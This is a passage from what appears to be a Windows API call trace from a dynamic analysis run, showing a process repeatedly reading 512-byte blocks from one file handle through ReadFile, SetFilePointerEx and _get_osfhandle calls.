lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.637] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.638] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.639] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.640] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.641] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.642] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.643] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.644] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, 